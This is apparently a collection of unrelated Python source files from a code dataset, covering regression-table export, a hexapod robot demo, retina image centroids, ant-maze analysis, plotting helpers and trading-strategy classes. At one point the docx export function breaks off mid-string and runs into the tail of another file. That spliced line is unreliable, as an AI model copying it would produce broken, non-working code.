res['t'].apply(lambda x: float_format_t % x)\n# for col in res.columns[:3]:\n# res[col] = res[col].apply(lambda x: float_format % x)\n # Std.Errors in parentheses\n res.iloc[:, 2] = '(' + res.iloc[:, 2] + ')'\n # Significance stars\n if stars:\n idx = res.iloc[:, 3] < .1\n res.loc[idx, res.columns[0]] = res.loc[idx, res.columns[0]] + '*'\n idx = res.iloc[:, 3] < .05\n 
res.loc[idx, res.columns[0]] = res.loc[idx, res.columns[0]] + '*'\n idx = res.iloc[:, 3] < .01\n res.loc[idx, res.columns[0]] = res.loc[idx, res.columns[0]] + '*'\n # Stack Coefs and Std.Errors\n res = res.iloc[:, [0,2]]\n res = res.stack()\n rsquared = getattr(result, 'rsquared', np.nan)\n rsquared_adj = getattr(result, 'rsquared_adj', np.nan)\n r2 = pd.Series({('R-squared', \"\"): rsquared,\n ('R-squared Adj.', \"\"): rsquared_adj})\n\n if r2.notnull().any():\n r2 = r2.apply(lambda x: float_format_adjr % x)\n res = pd.concat([res, r2], axis=0)\n res = pd.DataFrame(res)\n res.columns = [str(result.model.endog_names)]\n return res\n\n\n\ndef summary_col(results,\n float_format_t='%.4f',\n float_format_coef='%.2f',\n float_format_adjr='%.2f',\n model_names=(),\n stars=False,\n info_dict=None, regressor_order=(), drop_omitted=False):\n # sample\n # y = df['nft']\n # x = df[['epm',\"volt\",\"lnvol\",\"relative_spread\"]] \n # x1 = sm.add_constant(x)\n # est = sm.OLS(y, x1).fit()\n # a = summary_col([est,est],stars=True,float_format_t='%0.2f',float_format_coef='%0.4f',float_format_adjr='%0.2f')\n\n \n if not isinstance(results, list):\n results = [results]\n\n cols = [_col_params(x, stars=stars, float_format_t=float_format_t,float_format_coef=float_format_coef,float_format_adjr=float_format_adjr) for x in\n results]\n\n # Unique column names (pandas has problems merging otherwise)\n if model_names:\n colnames = _make_unique(model_names)\n else:\n colnames = _make_unique([x.columns[0] for x in cols])\n for i in range(len(cols)):\n cols[i].columns = [colnames[i]]\n\n def merg(x, y):\n return x.merge(y, how='outer', right_index=True,\n left_index=True)\n\n summ = reduce(merg, cols)\n\n if regressor_order:\n varnames = summ.index.get_level_values(0).tolist()\n vc = pd.Series(varnames).value_counts()\n varnames = vc.loc[vc == 2].index.tolist()\n ordered = [x for x in regressor_order if x in varnames]\n unordered = [x for x in varnames if x not in regressor_order]\n new_order = ordered + unordered\n other = [x for x in summ.index.get_level_values(0)\n if x not in new_order]\n new_order += other\n if drop_omitted:\n for uo in unordered:\n new_order.remove(uo)\n summ = summ.loc[new_order]\n\n idx = []\n index = summ.index.get_level_values(0)\n for i in range(0, index.shape[0], 2):\n idx.append(index[i])\n if (i + 1) < index.shape[0] and (index[i] == index[i + 1]):\n idx.append(\"\")\n else:\n idx.append(index[i + 1])\n summ.index = idx\n\n # add infos about the models.\n if info_dict:\n cols = [_col_info(x, info_dict.get(x.model.__class__.__name__,\n info_dict)) for x in results]\n else:\n cols = [_col_info(x, getattr(x, \"default_model_infos\", None)) for x in\n results]\n # use unique column names, otherwise the merge will not succeed\n for df, name in zip(cols, _make_unique([df.columns[0] for df in cols])):\n df.columns = [name]\n\n def merg(x, y):\n return x.merge(y, how='outer', right_index=True,\n left_index=True)\n\n info = reduce(merg, cols)\n dat = pd.DataFrame(np.vstack([summ, info])) # pd.concat better, but error\n dat.columns = summ.columns\n dat.index = pd.Index(summ.index.tolist() + info.index.tolist())\n \n dat = dat.drop(index=[\"R-squared\"])\n dat = dat.reset_index()\n return dat\n\n# Export the regression results in docx format\ndef output_docx(dataframe,output_name):\n # The table style is fixed to \"Light Shading\"; see http://www.voidcn.com/article/p-weenhbxd-bqy.html for the available styles\n # Sample\n # output_docx(a,path+\"a.docx\")\n doc = docx.Document()\n \n style = doc.styles['Normal']\n font = style.font\n font.name = 'Times New Roman' # font\n 
font.size = Pt(14) # font size\n\n # Add the table with the required number of rows and columns\n t = doc.add_table(dataframe.shape[0]+1, dataframe.shape[1],style=\"Light Shading\")\n \n # Header row\n for j in range(dataframe.shape[-1]):\n t.cell(0,j).text = dataframe.columns[j]\n t.cell(0,j).paragraphs[0].paragraph_format.alignment = WD_TABLE_ALIGNMENT.CENTER # center alignment\n t.cell(0,j).paragraphs[0].paragraph_format.space_before=Pt(4) # space before\n t.cell(0,j).paragraphs[0].paragraph_format.space_after=Pt(4) # space after\n\n # Table body\n for i in range(dataframe.shape[0]):\n for j in range(dataframe.shape[-1]):\n t.cell(i+1,j).text = str(dataframe.values[i,j])\n t.cell(i+1,j).paragraphs[0].paragraph_format.alignment = WD_TABLE_ALIGNMENT.CENTER\n t.cell(i+1,j).paragraphs[0].paragraph_format.space_before=Pt(4)\n t.cell(i+1,j).paragraphs[0].paragraph_format.space_after=Pt(4)\n\n # Table row heights\n t.rows[0].height=Pt(30)\n for i in range(1,len(dataframe)+1):\n t.rows[i].height=Pt(20) \n \n p = doc.add_paragraph()\n run=p.add_run('t-value in parentheses.')\n run.font.name = 'Times New Roman'\n run.font.size = Pt(16)\n p.alignment = WD_ALIGN_PARAGRAPH.CENTER\n p.paragraph_format.space_before=Pt(20)\n p.paragraph_format.space_after=Pt(0)\n \n p = doc.add_paragraph()\n run=p.add_run('* 1.65 xs[0]) else 1\n amp = mul*(ys[-1]-ys[0])\n ofs = np.max(ys) if (amp < 0) else np.min(ys)\n return dict(\n dispscale=1.0, n=0,\n amp=amp, ofs=ofs,\n )","repo_name":"qcrew-lab/qcrew","sub_path":"qcrew/analyze/fit_funcs/displacement_cal.py","file_name":"displacement_cal.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"28533028075","text":"import math\nimport time\nfrom interbotix_xs_modules.hexapod import InterbotixHexapodXS\n\n# This script makes the hexapod body move up and down for approximately 20 seconds\n#\n# To get started, open a terminal and type 'roslaunch interbotix_xshexapod_control xshexapod_control.launch robot_model:=pxmark4'\n# Then change to this directory and type 'python push_ups.py'\n\ndef main():\n bot = InterbotixHexapodXS('pxmark4')\n bot.hex.move_in_place(z=0.08)\n for step in range(500):\n z = 0.08 + 0.05 * math.sin(math.pi * step/25.0)\n bot.hex.move_in_place(z=z, moving_time=0.15, blocking=False)\n time.sleep(0.04)\n bot.hex.reset_hexapod('sleep')\n\nif __name__=='__main__':\n main()\n","repo_name":"Interbotix/interbotix_ros_crawlers","sub_path":"interbotix_ros_xshexapods/examples/python_demos/push_ups.py","file_name":"push_ups.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"68"} +{"seq_id":"9517523058","text":"'''The code takes the different centroids of the same particle on different 2D slices\n and creates a single centroid for the particle in 3D.\n It saves it in a final CSV file that contains the number of the particle and the coordinates of each centroid.\n'''\n\nimport os\nimport pandas as pd\nimport sys\n\nname_of_retina = sys.argv[1] #'retina1' #\nuniversel_path = sys.argv[2]\n\nprint('We are Detecting only one centroid for', name_of_retina)\n\n# Read the centroids from the original CSV file\ncsv_file = universel_path + name_of_retina + '/3D_images/MyCentroids.csv'\n\ndf = pd.read_csv(csv_file)\n\n# Prepare the output CSV file\ncsv_out_file = universel_path + name_of_retina + '/3D_images/My_one_time_Centroids.csv'\nif os.path.exists(csv_out_file):\n os.remove(csv_out_file)\n print(\"Existing file deleted.\")\nelse:\n print(\"File does not exist.\")\nmy_header = True\n\n# Iterate over unique 
labels\nmy_label_list = df['label'].unique()\nfor label in my_label_list:\n # Filter the DataFrame for the current label\n resu = df.loc[df['label'] == label]\n\n # Calculate the centroid coordinates\n centroid_img_idx = resu.iloc[int(len(resu) / 2), 0]\n moyx = resu['x_coord'].mean()\n moyy = resu['y_coord'].mean()\n\n # Create a new DataFrame for the centroid\n new_df = pd.DataFrame({'image_idx': [str(centroid_img_idx).zfill(4) + '.png'],\n 'label': [label],\n 'y_coord': [int(moyy)],\n 'x_coord': [int(moyx)]})\n\n # Append the centroid information to the output CSV file\n new_df.to_csv(csv_out_file, mode='a', header=my_header, index=False)\n my_header = False\n\n\n\n","repo_name":"Mellak/Toolbox-for-the-analysis-of-3D-OCT-images-of-murine-retina","sub_path":"StatisticalAnalysis/Extracting_Centroids/Extract_only_1_cenctroid_4Paper.py","file_name":"Extract_only_1_cenctroid_4Paper.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40661770020","text":"from trajectory_inheritance.trajectory_sep_into_states import Traj_sep_by_state\nfrom trajectory_inheritance.get import get\nfrom tqdm import tqdm\nimport pandas as pd\nfrom Directories import network_dir, home\nimport os\nfrom DataFrame.import_excel_dfs import dfs_human, dfs_ant\nimport json\nfrom Analysis.Efficiency.PathLength import PathLength\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom colors import colors_state\n\nstates = {'ab', 'ac', 'b', 'be', 'b1', 'b2', 'c', 'cg', 'e', 'eb', 'eg', 'f', 'g', 'h'}\ncolumns = ['filename', 'size', 'solver', 'state', 'turning radius (norm by 2 pi)'] # 'turning radius (norm by 2 pi)' = accumulated rotation\nplt.rcParams.update({'font.size': 22, 'font.family': 'Times New Roman'})\n\n\nclass BackRoomTurning:\n def __init__(self, unique_states: list):\n self.unique_states = unique_states\n\n def plot(self, df_size, ax):\n # plot results in columns 'turning radius (norm by 2 pi)' in a histogram\n if solver == 'human':\n limits = [[0, 1], [0, 1]]\n elif solver == 'ant':\n limits = [[0, 3], [0, 3]]\n\n c_states = {\"['ab']\": colors_state['ab'],\n \"['ac', 'ab']\": colors_state['ac']}\n\n for (states, df_state_size), lim in zip(df_size.groupby('state'), limits):\n theta = df_state_size['turning radius (norm by 2 pi)']\n ax.hist(theta, range=lim, bins=40,\n color=c_states[states], label=states, alpha=0.5, density=True)\n ax.set_xlabel('accumulated rotation (norm by 2 pi)')\n ax.set_ylabel('count')\n ax.legend()\n ax.set_title(f'{solver} {size}')\n ax.set_xlim(*lim)\n\n @staticmethod\n def to_list(string: str):\n return [eval(x) for x in string.strip('][').split(', ') if len(x) > 0]\n\n def calc_turning_angle(self, df) -> pd.DataFrame:\n new_results = pd.DataFrame(columns=columns)\n for filename in tqdm(df['filename']):\n x = get(filename)\n print(x.filename)\n\n ts = time_series_dict[x.filename]\n ts_extended = Traj_sep_by_state.extend_time_series_to_match_frames(ts, x)\n traj_parts = Traj_sep_by_state(x, ts_extended).get_states(wanted_states=self.unique_states)\n\n for traj_part in traj_parts:\n d_theta = PathLength(traj_part).rotational_distance(norm=False)\n print(filename, round(d_theta / (2 * np.pi), 3), list(set(traj_part.states)))\n d = {'filename': filename, 'size': x.size, 'solver': x.solver,\n 'state': list(set(traj_part.states)),\n 'turning radius (norm by 2 pi)': round(d_theta / (2 * np.pi), 3),\n }\n new_results = new_results.append(d, ignore_index=True)\n return new_results\n\n def 
calc_turning_angle_intermediate(self, df) -> pd.DataFrame:\n new_results = pd.DataFrame(columns=columns)\n for filename in tqdm(df['filename']):\n # if filename == 'M_SPT_5050016_MSpecialT_1':\n x = get(filename)\n print(x.filename)\n\n ts = time_series_dict[x.filename]\n ts_extended = Traj_sep_by_state.extend_time_series_to_match_frames(ts, x)\n x.smooth(sec_smooth=1)\n traj_parts = Traj_sep_by_state(x, ts_extended).get_states(wanted_states=self.unique_states)\n traj_parts = [t.split_at_directional_change_in_turning() for t in traj_parts]\n traj_parts = [item for sublist in traj_parts for item in sublist]\n\n for traj_part in tqdm(traj_parts, desc=filename):\n d_theta = PathLength(traj_part).rotational_distance(norm=False, smooth=False)\n print(filename, round(d_theta / (2 * np.pi), 3), list(set(traj_part.states)))\n d = {'filename': filename, 'size': x.size, 'solver': x.solver,\n 'state': list(set(traj_part.states)),\n 'turning radius (norm by 2 pi)': round(d_theta / (2 * np.pi), 3),\n }\n new_results = new_results.append(d, ignore_index=True)\n return new_results\n\n\nif __name__ == '__main__':\n with open(os.path.join(network_dir, 'time_series_selected_states.json'), 'r') as json_file:\n time_series_dict = json.load(json_file)\n json_file.close()\n unique_s = ['ab', 'ac']\n brt = BackRoomTurning(unique_states=unique_s)\n\n fig, axs = plt.subplots(2, 5, figsize=(25, 8))\n\n # new_results.to_excel(directory)\n for solver, dfs, ax in [['ant', dfs_ant, axs[0]], ['human', dfs_human, axs[1]], ]:\n directory = os.path.join(home, 'Analysis', 'discretisation',\n 'overturning_in_ab_ac_' + solver + '_intermediate.xlsx')\n results = pd.read_excel(directory, usecols=columns)\n results['size'] = results['size'].replace('Small Far', 'Small')\n results['size'] = results['size'].replace('Small Near', 'Small')\n for (size, df_size), a in zip(dfs.items(), ax):\n # turning radius when in unique states\n # directory = os.path.join(home, 'Analysis', 'discretisation', 'overturning_in_ab_ac_humans.xlsx')\n # new_results = brt.calc_turning_angle(pd.concat(dfs_ant))\n # new_results.to_excel(directory)\n\n # turning radius when in unique states and turning in the same direction\n # new_results = brt.calc_turning_angle_intermediate(pd.concat(dfs))\n\n results_size = results[results['filename'].isin(df_size['filename'])]\n brt.plot(results_size, a)\n plt.tight_layout()\n plt.savefig('images\\\\turning_angle\\\\' + 'turning_angle.png')\n plt.savefig('images\\\\turning_angle\\\\' + 'turning_angle.pdf')\n plt.savefig('images\\\\turning_angle\\\\' + 'turning_angle.svg')\n # for size, df in dfs_human.items():\n # coords = e_p[e_p['size'] == size]['extremal point'].map(ExtremalPoints.to_list).tolist()\n #\n # extr_points = ExtremalPoints(coordinates=coords, unique_state=unique_s)\n # cs = ConfigSpace_Maze('human', size, 'SPT',\n # ('MazeDimensions_human.xlsx', 'LoadDimensions_human.xlsx'))\n # cs.visualize_space()\n # extr_points.plot_in_cs(cs)\n #\n # mlab.show()\n DEBUG = 1\n","repo_name":"TabeaHeckenthaler/AntsShapes","sub_path":"Analysis/discretisation/overturning_in_ab_ac.py","file_name":"overturning_in_ab_ac.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38253708919","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\n\n\ndef plot_roc_binary(true, score, path, name):\n for ix, (tr, sc) in enumerate(zip(true, score)):\n fpr, tpr, thresholds = metrics.roc_curve(tr, sc)\n 
plt.plot(fpr, tpr, label=f'Epoch {(ix + 1) * 10}')\n plt.xlabel('False positive rate')\n plt.ylabel('True positive rate')\n plt.title('ROC curve of ' + name)\n plt.legend(loc='best')\n plt.savefig(path)\n plt.show()\n\n\ndef plot_roc(roc, path, name):\n plt.plot(roc, label='ROC AUC')\n plt.legend(frameon=False)\n plt.ylabel('ROC AUC')\n plt.title('ROC AUC Score of ' + name)\n plt.xlabel('Epoch')\n plt.savefig(path)\n plt.show()\n\n\ndef plot_loss(train_loss, test_loss, path, name):\n plt.plot(train_loss, label='Training loss')\n plt.plot(test_loss, label='Validation loss')\n plt.legend(frameon=False)\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.title(f'Loss of ' + name)\n plt.savefig(path)\n plt.show()\n\n\ndef plot_acc(train_acc, test_acc, path, name):\n plt.plot(train_acc, label='Training Acc')\n plt.plot(test_acc, label='Validation Acc')\n plt.legend(frameon=False)\n plt.ylabel('Percentage')\n plt.xlabel('Epoch')\n plt.title(f'Binary accuracy of ' + name)\n plt.savefig(path)\n plt.show()\n\n\ndef fill_labels(labels):\n labels = labels.reshape((len(labels), 1))\n for i in range(18):\n z = np.zeros((len(labels), 1))\n labels = np.append(labels, z, axis=1)\n return labels\n","repo_name":"stefanDeveloper/covid-19-neural-network","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4416328106","text":"\"\"\"\nis_derivative.py\n\"\"\"\nimport logging\nimport traceback\n\nfrom settings import FULL_NAMESPACE\nfrom skyline_functions import get_redis_conn_decoded\n\n\n# @added 20220406 - Feature #4520: settings - ZERO_FILL_NAMESPACES\n# Feature #4518: settings - LAST_KNOWN_VALUE_NAMESPACES\ndef is_derivative(current_skyline_app, metric):\n \"\"\"\n Returns a dict of base_names that are no longer active in the data pipeline.\n\n :param current_skyline_app: the app calling the function\n :param namespace: the namespace to access for inactive metrics\n :type current_skyline_app: str\n :type namespace: str\n :return: inactive_metrics\n :rtype: list\n\n \"\"\"\n function_str = 'functions.metrics.is_derivative'\n current_skyline_app_logger = current_skyline_app + 'Log'\n current_logger = logging.getLogger(current_skyline_app_logger)\n\n try:\n redis_conn_decoded = get_redis_conn_decoded(current_skyline_app)\n except Exception as e:\n current_skyline_app_logger = current_skyline_app + 'Log'\n current_logger = logging.getLogger(current_skyline_app_logger)\n current_logger.error(traceback.format_exc())\n current_logger.error('error :: %s :: %s :: get_redis_conn_decoded failed - %s' % (\n current_skyline_app, function_str, e))\n return False\n\n derivative_metrics = []\n try:\n derivative_metrics = list(redis_conn_decoded.smembers('aet.metrics_manager.derivative_metrics'))\n except Exception as e:\n current_logger.error('error :: %s :: failed to connect to Redis for smembers of derivative_metrics - %s' % (\n function_str, e))\n derivative_metrics = []\n\n if not metric.startswith(FULL_NAMESPACE):\n metric = '%s%s' % (FULL_NAMESPACE, metric)\n\n if metric in derivative_metrics:\n return True\n\n return False\n","repo_name":"earthgecko/skyline","sub_path":"skyline/functions/metrics/is_derivative.py","file_name":"is_derivative.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":464,"dataset":"github-code","pt":"68"} +{"seq_id":"35951857085","text":"from fastapi.encoders import jsonable_encoder\nfrom 
commons_telegram import *\nfrom respositories import *\nimport pandas as pd\nimport asyncio\nimport datetime\n\n\n\nclass AlgoSpread:\n def __init__(self,broker,userid):\n super().__init__()\n self.broker = broker\n self.userid = userid\n self.SpreadsRepository = None\n\n\n async def async_init(self):\n self.SpreadsRepository = await get_SpreadsRepository()\n return self\n\n def __await__(self):\n return self.async_init().__await__()\n\n async def get_spreads_strategy(self, strategy):\n try:\n spreads = await self.SpreadsRepository.fetch_by_strategy(strategy)\n if len(spreads) == 0:\n raise DataNotFoundException(f\"Spread data not found {strategy}\")\n # return [SpreadsSchemaOut(**record.__dict__) for record in spreads]\n return jsonable_encoder(spreads)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def get_spreads_strategy_status(self, strategy,status):\n try:\n spreads = await self.SpreadsRepository.fetch_by_strategy_status(strategy,status)\n if len(spreads) == 0:\n raise DataNotFoundException(f\"Spread data not found {strategy}\")\n # return [SpreadsSchemaOut(**record.__dict__) for record in spreads]\n return jsonable_encoder(spreads)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def get_spread(self, spreadid):\n try:\n spread_data = await self.SpreadsRepository.fetch_by_spreadid(spreadid)\n if spread_data is None:\n raise DataNotFoundException(f\"Spread data not found\")\n # return SpreadsSchemaOut(**spread_data.__dict__)\n return jsonable_encoder(spread_data)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def get_spreads_all(self):\n try:\n spreads = await self.SpreadsRepository.fetch_all()\n if len(spreads) == 0:\n raise DataNotFoundException(f\"Spread data not found\")\n\n # return [SpreadsSchemaOut(**record.__dict__) for record in spreads]\n return jsonable_encoder(spreads)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def calculate_margin(self, spread):\n pass\n\n async def update(self, spread):\n try:\n spread_data = await self.SpreadsRepository.update(spread)\n if spread_data is None:\n raise DataNotFoundException(f\"Spread data not found\")\n # return SpreadsSchemaOut(**spread_data.__dict__)\n return jsonable_encoder(spread_data)\n\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def delete(self, spreadid):\n try:\n spread_data = await self.SpreadsRepository.delete(spreadid)\n if spread_data is None:\n raise DataNotFoundException(f\"Spread data not found {spreadid}\")\n # return SpreadsSchemaOut(**spread_data.__dict__)\n return jsonable_encoder(spread_data)\n\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def create(self,spread):\n try:\n spread_data = await self.SpreadsRepository.create(spread)\n # return SpreadsSchemaOut(**spread_data.__dict__)\n return jsonable_encoder(spread_data)\n\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def create_credit_spread(self,signal):\n pass\n # leg1CreateOrder = CreateOrderSchema(strategy=\"string\",\n # exchange=\"NSE\",\n # segment=\"nse_cm\",\n # symbol=\"string\",\n # productType=\"CNC\",\n # orderType=\"L\",\n # orderPurpose=\"Entry\",\n # transactionType=\"B\",\n # quantity=0,\n # orderPrice=0,\n # triggerPrice=0,\n # validity=\"DAY\",\n # amo=\"NO\",\n # tag=\"\"\n # )\n #\n # leg2CreateOrder = CreateOrderSchema(strategy=\"string\",\n # exchange=\"NSE\",\n # segment=\"nse_cm\",\n # symbol=\"string\",\n # productType=\"CNC\",\n # orderType=\"L\",\n 
# orderPurpose=\"Entry\",\n # transactionType=\"B\",\n # quantity=0,\n # orderPrice=0,\n # triggerPrice=0,\n # validity=\"DAY\",\n # amo=\"NO\",\n # tag=\"\"\n # )\n #\n # leg1Details = await self.algoTrade.entry(leg1CreateOrder)\n # leg2Details = await self.algoTrade.entry(leg2CreateOrder)\n #\n # await self.create(spread)\n\n\n async def create_debit_spread(self,signal):\n pass\n\n async def create_naked_spread(self,signal):\n algoTrade = AlgoTrade(self.broker,self.userid)\n\n # leg1CreateOrder = CreateOrderSchema(strategy=signal.get('strategy'),\n # exchange=signal.get('exchange'),\n # segment=signal.get('segment'),\n # symbol=signal.get('symbol'),\n # productType=signal.get('productType'),\n # orderType=signal.get('orderType'),\n # orderPurpose=signal.get('orderPurpose'),\n # transactionType=signal.get('transactionType'),\n # quantity=signal.get('quantity'),\n # orderPrice=signal.get('orderPrice'),\n # triggerPrice=signal.get('triggerPrice'),\n # validity=signal.get('validity'),\n # amo=signal.get('amo'),\n # tag=signal.get('tag')\n # )\n\n leg1Details = await algoTrade.entry(signal)\n\n spread_data = SpreadsSchemaIn(Broker=self.broker,\n UserId=self.userid,\n Date=str(datetime.date.today()),\n Symbol=signal.get('symbol'),\n Status=\"Active\",\n ExpiryDate=\"2023-12-31\",\n ExpiryType=\"Weekly_Expiry\",\n ProductType=signal.get('productType'),\n Exchange=signal.get('exchange'),\n Segment=signal.get('segment'),\n TradeType=\"Systematic\",\n Trend=\"Buy\",\n Spot_Price=150.0,\n Strike=160.0,\n Leg1_Strike=0,\n Leg1_Side='Buy',\n Leg1_Symbol=signal.get('symbol'),\n Leg1_Qty=signal.get('quantity'),\n Leg1_BuyPrice=0,\n Leg1_BuyOrderId=leg1Details['data'][0].get('nOrdNo'),\n Leg1_SellPrice=0,\n Leg1_SellOrderId=0,\n Leg1_Sl_Price=0,\n Leg1_Sl_OrderId=0,\n Leg1_Tg_Price=0,\n Leg1_Tg_OrderId=0,\n Leg1_Pnl=0,\n Leg2_Strike=0,\n Leg2_Side=None,\n Leg2_Symbol='xxx',\n Leg2_Qty=0,\n Leg2_BuyPrice=0,\n Leg2_BuyOrderId=0,\n Leg2_SellPrice=0,\n Leg2_SellOrderId=0,\n Leg2_Sl_Price=0,\n Leg2_Sl_OrderId=0,\n Leg2_Tg_Price=0,\n Leg2_Tg_OrderId=0,\n Leg2_Pnl=0,\n Trade_StartTime=str(datetime.datetime.now().replace(microsecond=0)),\n Trade_EndTime=str(datetime.datetime.now().replace(microsecond=0)),\n Total_Premium=250.0,\n Total_Sl=17.0,\n LastPrice=155.0,\n LastPriceDate=str(datetime.datetime.now().replace(microsecond=0)),\n MarketValue=750.0,\n Strategy=signal.get('strategy'),\n Instrument=signal.get('instrument'),\n Pyramid=1,\n UnderlyingSymbol=signal.get('underlyingSymbol'),\n TradeDuration=signal.get('tradeDuration'),\n SpreadNumber=1,\n SpreadType=\"NakedBuy\",\n SpreadStatus=\"Full\",\n Pnl=150.0,\n Charges=5.0,\n PnlNet=145.0,\n Remarks=\"This is a dummy record\",\n )\n\n # spread_data = SpreadsSchemaIn(Broker=self.broker,\n # UserId=self.userid,\n # Date=str(datetime.date.today()),\n # Symbol=signal.get('symbol'),\n # Status=\"Active\",\n # ExpiryDate=\"2023-12-31\",\n # ExpiryType=\"Weekly_Expiry\",\n # ProductType=signal.get('productType'),\n # Exchange=signal.get('exchange'),\n # Segment=signal.get('segment'),\n # TradeType=\"Systematic\",\n # Trend=\"Buy\",\n # Spot_Price=150.0,\n # Strike=160.0,\n # Leg1_Strike=leg1Details.get(''),\n # Leg1_Side=leg1Details.get(''),\n # Leg1_Symbol=leg1Details.get(''),\n # Leg1_Qty=leg1Details.get(''),\n # Leg1_BuyPrice=leg1Details.get(''),\n # Leg1_BuyOrderId=leg1Details.get(''),\n # Leg1_SellPrice=leg1Details.get(''),\n # Leg1_SellOrderId=leg1Details.get(''),\n # Leg1_Sl_Price=leg1Details.get(''),\n # Leg1_Sl_OrderId=leg1Details.get(''),\n # 
Leg1_Tg_Price=leg1Details.get(''),\n # Leg1_Tg_OrderId=leg1Details.get(''),\n # Leg1_Pnl=leg1Details.get(''),\n # Leg2_Strike=leg1Details.get(''),\n # Leg2_Side=leg1Details.get(''),\n # Leg2_Symbol=leg1Details.get(''),\n # Leg2_Qty=leg1Details.get(''),\n # Leg2_BuyPrice=leg1Details.get(''),\n # Leg2_BuyOrderId=leg1Details.get(''),\n # Leg2_SellPrice=leg1Details.get(''),\n # Leg2_SellOrderId=leg1Details.get(''),\n # Leg2_Sl_Price=leg1Details.get(''),\n # Leg2_Sl_OrderId=leg1Details.get(''),\n # Leg2_Tg_Price=leg1Details.get(''),\n # Leg2_Tg_OrderId=leg1Details.get(''),\n # Leg2_Pnl=leg1Details.get(''),\n # Trade_StartTime=str(datetime.datetime.now().replace(microsecond=0)),\n # Trade_EndTime=str(datetime.datetime.now().replace(microsecond=0)),\n # Total_Premium=250.0,\n # Total_Sl=17.0,\n # LastPrice=155.0,\n # LastPriceDate=str(datetime.datetime.now().replace(microsecond=0)),\n # MarketValue=750.0,\n # Strategy=signal.get('strategy'),\n # Instrument=signal.get('instrument'),\n # Pyramid=1,\n # UnderlyingSymbol=signal.get('underlyingSymbol'),\n # TradeDuration=signal.get('tradeDuration'),\n # SpreadNumber=1,\n # SpreadType=\"NakedBuy\",\n # SpreadStatus=\"Full\",\n # Pnl=150.0,\n # Charges=5.0,\n # PnlNet=145.0,\n # Remarks=\"This is a dummy record\",\n # )\n\n spread = await self.create(spread_data)\n return spread\n\n async def create_strangle_spread(self,signal):\n pass\n\n\nclass AlgoHedge:\n def __init__(self,broker,userid):\n super().__init__()\n self.broker = broker\n self.userid = userid\n self.HedgesRepository = None\n\n async def async_init(self):\n self.HedgesRepository = await get_HedgesRepository()\n return self\n\n def __await__(self):\n return self.async_init().__await__()\n\n async def get_hedges_strategy(self, strategy):\n try:\n hedges = await self.HedgesRepository.fetch_by_strategy(strategy)\n if len(hedges) == 0:\n raise DataNotFoundException(f\"Hedge data not found\")\n # return [HedgesSchemaOut(**record.__dict__) for record in hedges]\n return jsonable_encoder(hedges)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n async def get_hedges_strategy_status(self, strategy,status):\n try:\n hedges = await self.HedgesRepository.fetch_by_strategy_status(strategy,status)\n if len(hedges) == 0:\n raise DataNotFoundException(f\"Hedge data not found\")\n # return [HedgesSchemaOut(**record.__dict__) for record in hedges]\n return jsonable_encoder(hedges)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def get_hedge(self, hedgeid):\n try:\n hedge_data = await self.HedgesRepository.fetch_by_hedgeid(hedgeid)\n if hedge_data is None:\n raise DataNotFoundException(f\"Hedge data not found\")\n # return HedgesSchemaOut(**hedge_data.__dict__)\n return jsonable_encoder(hedge_data)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def get_hedges_all(self):\n try:\n hedges = await self.HedgesRepository.fetch_all()\n if len(hedges) == 0:\n raise DataNotFoundException(f\"Hedge data not found\")\n # return [HedgesSchemaOut(**record.__dict__) for record in hedges]\n return jsonable_encoder(hedges)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n\n async def update(self, hedge):\n try:\n hedge_data = await self.HedgesRepository.update(hedge)\n if hedge_data is None:\n raise DataNotFoundException(f\"Hedge data not found\")\n # return HedgesSchemaOut(**hedge_data.__dict__)\n return jsonable_encoder(hedge_data)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def delete(self, hedgeid):\n 
try:\n hedge_data = await self.HedgesRepository.delete(hedgeid)\n if hedge_data is None:\n raise DataNotFoundException(f\"Hedge data not found {hedgeid}\")\n # return HedgesSchemaOut(**hedge_data.__dict__)\n return jsonable_encoder(hedge_data)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n async def create(self,hedge):\n try:\n hedge_data = await self.HedgesRepository.create(hedge)\n # return HedgesSchemaOut(**hedge_data.__dict__)\n return jsonable_encoder(hedge_data)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n\nclass AlgoPLFundsRisk:\n def __init__(self,broker,userid):\n super().__init__()\n self.broker = broker\n self.userid = userid\n self.PLFundsRiskRepository = None\n\n async def async_init(self):\n self.PLFundsRiskRepository = await get_PLFundsRiskRepository()\n return self\n\n def __await__(self):\n return self.async_init().__await__()\n\n async def get_plfundsrisks_data(self, date):\n try:\n plfundsrisks = await self.PLFundsRiskRepository.fetch_by_date(date)\n if len(plfundsrisks) == 0:\n raise DataNotFoundException(f\"PLFundsRisk data not found : {date}\")\n # return [PLFundsRiskSchema(**record.__dict__) for record in plfundsrisks]\n return jsonable_encoder(plfundsrisks)\n except Exception as e:\n await log_with_bot('e', e)\n raise e\n\n\n async def get_plfundsrisks_all(self):\n try:\n plfundsrisks = await 